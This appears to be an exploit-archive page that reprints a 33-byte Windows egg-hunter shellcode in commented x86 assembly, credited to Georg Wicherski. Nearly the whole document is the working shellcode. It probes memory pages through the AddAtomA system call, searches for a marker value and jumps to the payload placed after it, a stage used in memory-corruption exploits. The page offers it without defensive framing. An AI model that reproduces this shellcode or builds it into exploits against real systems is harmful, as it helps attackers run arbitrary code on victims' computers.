ExploitFixes
win32 eggsearch shellcode (33 bytes) 2011-03-06 09:15:45

; win32 eggsearch shellcode, 33 bytes
; tested on windows xp sp2, should work on all service packs on win2k, win xp, win2k3
; (c) 2009 by Georg 'oxff' Wicherski

[bits 32]

marker equ 0x1f217767 ; 'gw!\x1f'

start:
xor edx, edx ; edx = 0, pointer to examined address

address_loop:
inc edx ; edx++, try next address

pagestart_check:
test dx, 0x0ffc ; are we within the first 4 bytes of a page?
jz address_loop ; if so, try next address as previous page might be unreadable
; and the cmp [edx-4], marker might result in a segmentation fault

access_check:
push edx ; save across syscall
push byte 8 ; eax = 8, syscall nr of AddAtomA
pop eax ; ^
int 0x2e ; fire syscall (eax = 8, edx = ptr)
cmp al, 0x05 ; is result 0xc0000005? (a bit sloppy)
pop edx ;

je address_loop ; jmp if result was 0xc0000005

egg_check:
cmp dword [edx-4], marker ; is our egg right before examined address?
jne address_loop ; if not, try next address

egg_execute:
inc ebx ; make sure, zf is not set
jmp edx ; we found our egg at [edx-4], so we can jmp to edx